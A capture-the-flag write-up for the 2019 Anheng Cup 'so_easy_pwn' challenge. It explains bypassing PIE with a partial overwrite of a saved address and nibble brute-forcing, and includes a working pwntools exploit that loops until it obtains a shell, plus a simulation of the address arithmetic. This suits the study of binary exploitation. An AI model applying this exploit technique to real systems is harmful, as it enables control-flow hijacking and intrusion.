安恒杯2019-so_easy_pwn

Overwrite data on the stack so that the stack state seen by the next function is changed, and use that to hijack the address it transfers control to.

0x01 PIE bypass

Even with PIE enabled, the low three hex digits (the 12-bit page offset) of a code address do not change. So we usually overwrite only the low four hex digits (two bytes) of the saved address: three of those digits are known from the binary, and the single remaining nibble (16 possibilities) is brute-forced until execution lands on the function we want.

recv(timeout = 1) is what drives the retry loop: when the guessed nibble is wrong the process crashes, the read hits EOF and raises, and the except branch restarts with a fresh process; when the guess is right the spawned shell is still alive, the read simply times out with no exception, and the else branch drops into interactive().
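The address arithmetic behind the partial overwrite, as an added example that is not part of the original write-up and does not use the real challenge binary. It models the service exactly as the exploit treats it (these are assumptions taken from the exploit, not facts about the binary): the banner leaks the upper 16 bits of the 32-bit PIE base as a decimal number, the target function sits at page offset 0x9cd, the overwritten slot lies 12 bytes into the buffer, and only the nibble in bits 12-15 is unknown. FakeTarget, candidate_addr and the two brute-force strategies are hypothetical names chosen here; struct.pack("<I", ...) stands in for pwntools p32.

```python
"""Partial overwrite of a PIE address from a 16-bit leak plus a known page offset.

Constructed model (not the real challenge): a 32-bit PIE binary whose text base
is page-aligned, the target function at base + 0x9cd, and a service that leaks
base >> 16 in decimal, which is what int(sh.recv(5)) in the exploit parses.
"""
import random
import struct

PAGE_OFFSET = 0x9cd   # low 12 bits of the target function, fixed by the ELF (assumed)
GUESS_NIBBLE = 0xa    # the nibble the exploit hard-codes in 'a9cd'
PAD = b"a" * 12       # filler up to the address slot (12 bytes in the exploit)


def candidate_addr(leak, nibble, page_offset=PAGE_OFFSET):
    """Rebuild a 32-bit address from the decimal leak of its top 16 bits, a
    guessed bits-12..15 nibble and the known page offset.  This is exactly
    int(hex(int(leak)) + 'a9cd', 16) from the exploit, done with shifts."""
    hi = int(leak)
    if not (0 <= hi <= 0xffff and 0 <= nibble <= 0xf and 0 <= page_offset <= 0xfff):
        raise ValueError("address component out of range")
    return (hi << 16) | (nibble << 12) | page_offset


def build_payload(addr, pad=PAD):
    """Filler followed by the address little-endian (what p32 produces)."""
    return pad + struct.pack("<I", addr)


class FakeTarget:
    """Stand-in for one process of the service: a fresh ASLR base per instance."""

    def __init__(self, seed):
        rng = random.Random(seed)
        # page-aligned base; bits 12-15 are the nibble the attacker must guess
        self.base = rng.randrange(0x10000, 0xf0000000, 0x1000)
        self.func = self.base + PAGE_OFFSET   # the function we want to reach

    def leak(self):
        return str(self.base >> 16)           # decimal, like the real banner

    def hijack(self, payload):
        (addr,) = struct.unpack("<I", payload[len(PAD):len(PAD) + 4])
        return addr == self.func              # exact hit gives the shell, else crash


def attack_until_shell(seed=1, max_runs=200):
    """Strategy of the write-up: keep the guessed nibble fixed and restart the
    process until ASLR happens to pick a matching base (p = 1/16 per run).
    Returns the run number on which the shell was obtained, or None."""
    for run in range(1, max_runs + 1):
        target = FakeTarget(seed + run)       # new process, new random base
        payload = build_payload(candidate_addr(target.leak(), GUESS_NIBBLE))
        if target.hijack(payload):
            return run
    return None


def enumerate_nibbles(target):
    """Alternative when the base does NOT change between attempts (for example
    a forking server): walk all 16 nibbles against the same leak.  Returns the
    nibble that hit, or None."""
    leak = target.leak()
    for nib in range(16):
        if target.hijack(build_payload(candidate_addr(leak, nib))):
            return nib
    return None


if __name__ == "__main__":
    print("hex(int('22101')) + 'a9cd' ->", hex(candidate_addr("22101", GUESS_NIBBLE)))
    print("fixed-nibble retries needed:", attack_until_shell())
    t = FakeTarget(7)
    print("enumeration found nibble:", enumerate_nibbles(t), "true:", (t.base >> 12) & 0xf)
```

The two strategies are not interchangeable: because the challenge spawns a new process per attempt, every attempt gets a new base, so walking the 16 nibbles one after another buys nothing over the write-up's fixed guess; enumeration only pays off when the base stays put across attempts.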

0x02 EXP

from pwn import *
context.log_level = 'debug'
i = 0
shell = 'a9cd'   # guessed nibble 'a' followed by the fixed low 12 bits 0x9cd of the target
while True:
    i += 1
    print(i)
    sh = process('./pwn')
    #sh = remote('101.71.29.5',10000)
    sh.recvuntil(b"Welcome our the ")
    # the banner leaks the upper 16 bits of the PIE base as a decimal number
    PIE_addr = hex(int(sh.recv(5)))
    # 12 bytes of filler, then the reconstructed address (p32 == little-endian 4 bytes)
    payload = b'a'*12 + p32(int(PIE_addr + shell, 16))
    sh.recvuntil(b"So, Can you tell me your name?")
    sh.send(payload)
    sh.recvuntil(b"Please input your choice:(1.hello|2.byebye):")
    sleep(0.1)
    sh.sendline(b'\x00')
    try:
        # wrong nibble: the child crashes, recv hits EOF and raises, so we retry
        sh.recv(timeout=1)
        sh.recv(timeout=1)
    except Exception as e:
        print('exception %s' % e)
        sh.close()
        continue
    else:
        # right nibble: the shell is alive and recv only timed out
        sleep(0.1)
        sh.interactive()
        break